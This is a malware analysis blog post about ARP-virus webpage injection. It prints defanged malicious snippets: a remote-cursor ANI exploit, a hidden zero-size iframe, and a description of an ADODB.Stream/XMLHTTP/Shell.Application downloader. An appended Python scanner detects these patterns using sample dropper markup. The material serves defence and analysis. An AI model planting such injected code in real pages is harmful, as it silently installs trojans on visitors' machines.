Endurer original
Version 1
Analyzed
What about ARP virus "Eat ripba "?
http://endurer.bokee.com/6277614.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/16/1611620.aspx
http://blog.sina.com.cn/u/49926d91010008q6
The automatically added URL hxxp: // www. z * PX ** 5 ** 2 * 0.com/020.0000.htm contains two pieces of malicious code.
The first is:
/---
<body style='cursor: url(hxxp: // Q ***. Z *** PX *** 5 *** 2 * 0.com/w*{}.js)'>
---/
W***.js uses the ANI vulnerability to download 0.exe.
File Description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 10:51:40
Modification time: 10:51:40
Access time: 10:51:57
Size: 16652 bytes, 16.268 KB
MD5: 07c7128add5aed0197d66a15a59960d7
Kaspersky reports it as Trojan-Downloader.Win32.Delf.bjy.
The second is:
/---
<iframe src="hxxp: // www. z * PX ** 5 ** 2 * 0.com/1***.htm" width="0" height="0" frameborder="0"></iframe>
---/
The content of hxxp: // www. z * PX ** 5 ** 2 * 0.com/1***.htm is JavaScript and VBScript code that uses ADODB.Stream, Microsoft.XMLHTTP and Scripting.FileSystemObject to download 0.exe, save it as msinfo.exe, and create msinfo.vbs, and uses the ShellExecute method of the Shell.Application object for execution.
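
A defender-side check for the two injected snippets described above, as an added example that is not part of the original post: it parses an HTML response and flags a zero-size iframe, a style that loads a cursor from a remote URL, and a script that references two or more of the ActiveX objects named above. The `scan` function, the finding labels and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# ActiveX ProgIDs the page names in the downloader script (lower-cased for matching).
PROGIDS = ("adodb.stream", "microsoft.xmlhttp",
           "scripting.filesystemobject", "shell.application")
# cursor: url(...) pointing at an absolute or protocol-relative (remote) address.
REMOTE_CURSOR = re.compile(r"cursor\s*:\s*url\s*\(\s*['\"]?\s*(?:https?:)?//", re.I)
ZERO = {"0", "0px"}

class InjectionScanner(HTMLParser):
    """Flags the two injected snippets and the script they lead to."""
    def __init__(self):
        super().__init__()
        self.findings, self._script = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        # Snippet 2: an iframe rendered at 0x0 so the user never sees it.
        if (tag == "iframe" and a.get("width", "").lower() in ZERO
                and a.get("height", "").lower() in ZERO):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        # Snippet 1: a style that makes the browser fetch a remote cursor file.
        if REMOTE_CURSOR.search(a.get("style", "")):
            self.findings.append(("remote-cursor", tag))
        if tag == "script":
            self._script = []          # start buffering the script body

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data.lower())

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            hits = [p for p in PROGIDS if p in body]
            if len(hits) >= 2:         # one ProgID alone is too common to flag
                self.findings.append(("dropper-script", ",".join(hits)))
            self._script = None

def scan(html):
    s = InjectionScanner()
    s.feed(html)
    s.close()
    return s.findings

# Constructed sample response (placeholder hosts, not taken from the page).
SAMPLE = """<html><body style='cursor: url(http://cdn.example.invalid/a.js)'>
<iframe src="http://www.example.invalid/1.htm" width="0" height="0" frameborder="0"></iframe>
<script language="VBScript">
Set x = CreateObject("Microsoft.XMLHTTP") : Set s = CreateObject("ADODB.Stream")
</script></body></html>"""
```

Because ARP-spoofing injection alters pages in transit, run a check like this on responses as a client on the affected LAN segment receives them, not on the files stored on the web server.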